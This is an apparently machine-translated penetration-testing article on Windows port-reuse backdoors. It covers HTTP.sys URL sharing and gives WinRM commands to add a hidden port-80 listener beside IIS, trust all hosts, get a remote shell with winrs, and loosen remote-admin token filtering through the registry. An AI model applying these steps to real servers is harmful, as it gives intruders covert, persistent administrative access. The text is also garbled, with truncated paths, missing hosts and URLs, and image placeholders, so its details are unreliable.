Penetration Testing-Port Reuse Forward Backdoor

Penetration Testing-Port Reuse Forward Backdoor

Add knowledge of port reuse


0x01 About port multiplexing


Port reuse is also a very old backdoor technology, mainly hijacking the memory space of web server related processes/services, system APIs and even hijacking network drivers to achieve their goals.

In the implementation of winsocket, multiple bindings are possible for server bindings. When determining who to use multiple bindings, according to a principle, who is the clearest designation will be delivered to whom, and there is no authority. This multiple binding is called port multiplexing.

The summary here is based on the combination of web services and HTTP.sys driver for port administration and backdoor protection.



0x02 Net.TCP Port Sharing




To put it simply, when the TCP/IP protocol was first introduced, TCP/IP assigned a unique 16-bit port number for each application protocol, thereby using the port number to distinguish applications .


Deploying applications that use non-standard ports is often complicated or even impossible due to the presence of corporate firewalls and personal firewalls. 


Now using the NET.TCP Port Sharing service provided by Microsoft, as long as you follow the relevant development interface rules, different applications can share the same web server port .



In HTTP.SYS model, many communication applications in the different multiplexed HTTP multiplexed to a single TCP port. This model has become the standard on the Windows platform. This provides a common point of control for firewall administrators and allows application developers to minimize the deployment costs of generating new applications that can utilize the network.

The ability to share ports between multiple HTTP applications has long been a feature of Internet Information Services (IIS). However, it is only through the introduction of HTTP. The extensive IIS 6.0 SYS (kernel mode HTTP protocol listener) is completely obtained using this infrastructure. 




(1) When IIS or other applications use HTTP Server API to monitor the request path, these applications need to register url prefix on HTTP.SYS . For the rules of registering URL, please refer to MSDN: com/en-us/library/windows/desktop/aa364698(v=vs.85).aspx  . This is the registration process.


(2) When a request comes and is acquired by http.sys, it needs to distribute the request to the application that registered the current URL . This is the routing process.


So here, the concept of port reuse is very simple. Use HTTP Server API to register different URL request addresses, and use http.sys to process and distribute different URL requests to different applications to achieve port reuse, achieving "different applications sharing ports "Effect.






0x03 http.sys && WinRM

HTTP.sys driver

HTTP.sys driver is the main component of IIS


netsh http show servicestate

The command can view all URL prefixes registered on HTTP.sys.



In fact, WinRM registers the URL prefix of wsman on HTTP.sys and listens on port 5985 by default. This can also be seen from the WinRM architecture diagram published by Microsoft.



0x04 Port multiplexing forward backdoor implementation


Native support for Web Application development based on Net.tcp Port Sharing




The first is to register the format of UrlPrefix.

UrlPrefix format

UrlPrefix has the following syntax:

"Scheme: //Host: Port/relativeURI"



"Http:// /" 
"HTTPS: //at the beginning +: 80/virtual root/"



Forward backdoor program registration url

View Image


C:\Documents and Settings\Administrator>" C:\Documents and Settings\Administrator\Desktop\door\d



Specify address to connect

 View Image


 There is also a common pseudo port reuse scenario:

By default, winsocket does not allow multiple bindings to the same address and port. We can bind: local addresses such as and 192.168.1.*.

View Image



0x05 WinRM front door

WinRM service

The full name of WinRM is Windows Remote Management, which is a part of Microsoft server hardware management function, which can manage local or remote servers. The WinRM service allows administrators to remotely log in to the Windows operating system and obtain an interactive command-line shell similar to Telnet. The underlying communication protocol uses HTTP .



Open WinRM service

In server operating systems above Windows 2012, the WinRM service is started by default and listens on port 5985


For Windows 2008, you need to use commands to start the WinRM service. The commands for quick configuration and startup are

winrm quickconfig -q

After this command is run, it will automatically add firewall exception rules and release port 5985.


Add 80 port Listener

For the machine that originally opened the WinRM service, it is necessary to retain the original 5985 port listener, and at the same time, it is necessary to add a port 80 listener, so as to ensure that the original 5985 port administrator can use it, and we can also connect through port 80 WinRM.

Use the following command to add a port 80 listener

winrm set winrm/config/service @{EnableCompatibilityHttpListener=" true "}

For servers installed with Windows 2012 and above operating systems, only this command is needed to achieve port reuse.

 At this time, the original port 5985 is still retained .




Modify the port to 80:

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port=" 80 "}


 After configuration, WinRM has listened to a listener on port 80, and at the same time, the IIS web service can also run normally.

 View Image


Backdoor connection:

When you need to connect to the WinRM service locally, you need to configure and start the WinRM service first, and then you need to set the host to trust the connection, and execute the following two commands.

winrm quickconfig -q

winrm set winrm/config/Client @{TrustedHosts=" * "}


Connect to use

Use the winrs command to connect to the remote WinRM service to execute the command and return the result

winrs -r: -p:xxxxx whoami

You can also access cmd to get an interactive shell.



The WinRM service is also affected by UAC, so only administrators in the local administrator user group can log in, and other administrator users cannot remotely log in to WinRM. To allow other users in the local administrator group to log in to WinRM, you need to modify the registry settings.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System/v LocalAccountTokenFilterPolicy/t REG_DWORD/d 1/f








Reprinted at:

Reference :